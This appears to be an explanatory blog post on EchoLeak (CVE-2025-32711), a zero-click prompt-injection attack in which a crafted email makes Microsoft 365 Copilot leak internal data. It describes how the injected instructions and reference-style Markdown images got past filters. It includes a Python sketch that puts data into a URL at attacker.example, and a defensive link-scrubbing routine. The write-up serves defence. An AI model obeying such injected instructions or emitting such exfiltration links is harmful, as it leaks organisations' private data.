“EchoLeak”: How It Was Exploited

So, what happened?

In June 2025, researchers at Aim Security revealed a new class of attack they call “EchoLeak,” officially tracked as CVE‑2025‑32711. With no user interaction required, not even a click or a login, a single crafted email could trigger Microsoft 365 Copilot to exfiltrate sensitive organizational data.


How Did Hackers Get In?

  • The attack leveraged what researchers describe as an “LLM scope violation”: untrusted input that reads like an ordinary request but actually directs Copilot to access and leak privileged internal data.

  • It bypassed multiple defenses, including Markdown redaction filters and Content Security Policy (CSP), by using hidden reference-style links or images to trigger the data transfer, all without any human interaction (a sketch of the primitive follows below).
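
To make that primitive concrete, here is a minimal, hypothetical Python sketch of how a reference-style Markdown image can smuggle data out through its URL. `ATTACKER_HOST` and `build_exfil_markdown` are illustrative assumptions, not the actual EchoLeak payload.

```python
# Hypothetical illustration of the exfiltration primitive (NOT the actual
# EchoLeak payload): a reference-style Markdown image whose URL carries
# data the model was tricked into emitting. If a client auto-renders the
# Markdown, fetching the "image" sends the data to the attacker's server.
from urllib.parse import quote

ATTACKER_HOST = "https://attacker.example"  # hypothetical collection server


def build_exfil_markdown(stolen_snippet: str) -> str:
    """Return Markdown that hides the payload in a reference-style image.

    Reference-style syntax (the [ref] label defined on a separate line) is
    easy to overlook, which is why redaction filters that only match inline
    ![alt](url) patterns can miss it.
    """
    payload = quote(stolen_snippet)
    return (
        "Here is the summary you asked for.\n\n"
        "![logo][ref]\n\n"
        f"[ref]: {ATTACKER_HOST}/img.png?d={payload}\n"
    )


print(build_exfil_markdown("Q3 revenue forecast: ..."))
```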


Who Was Impacted?

  • Any organization using Microsoft 365 Copilot with default settings was theoretically vulnerable.

  • Sensitive assets at risk included emails, documents, Teams chats, and OneDrive/SharePoint files: in short, any content Copilot had permission to access.

  • While no evidence exists of real-world exploitation to date, experts warn this may be just the tip of the iceberg.


What Can We Learn From This?

  1. AI agents are active attack surfaces: this is the first documented zero-click exfiltration via an AI assistant.

  2. Zero-click doesn’t mean zero risk: even seemingly harmless inputs can cascade into major data leaks.

  3. Defense must adapt: traditional filters aren’t enough; we need agent-aware monitoring and threat models (a minimal sketch follows).
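
As one example of what “agent-aware” monitoring could mean in practice, below is a minimal Python sketch that scrubs non-allowlisted link and image targets from model output before it is rendered. The function names, regexes, and `ALLOWED_HOSTS` allowlist are assumptions for illustration, not any vendor's actual mitigation.

```python
# A minimal sketch of one "agent-aware" control: strip external link and
# image targets from model output before rendering, allowing only an
# approved set of hosts. The allowlist below is a hypothetical example.
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"contoso.sharepoint.com"}  # hypothetical tenant allowlist

# Matches inline links/images like [text](url) or ![alt](url), and
# reference-style definitions like "[label]: url" on their own line.
URL_PATTERNS = [
    re.compile(r"!?\[[^\]]*\]\((https?://[^)\s]+)\)"),
    re.compile(r"^\s*\[[^\]]+\]:\s*(https?://\S+)", re.MULTILINE),
]


def scrub_markdown(text: str) -> str:
    """Replace any link whose host is not allowlisted with a placeholder."""
    for pattern in URL_PATTERNS:
        for match in pattern.finditer(text):
            if urlparse(match.group(1)).hostname not in ALLOWED_HOSTS:
                text = text.replace(match.group(0), "[link removed]")
    return text


# The hidden reference-style definition is neutralized before rendering.
demo = "![logo][ref]\n\n[ref]: https://attacker.example/i.png?d=secret"
print(scrub_markdown(demo))
```

In a real deployment, a check like this would sit between the model's response and the UI renderer, alongside logging of which data sources the agent actually touched.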

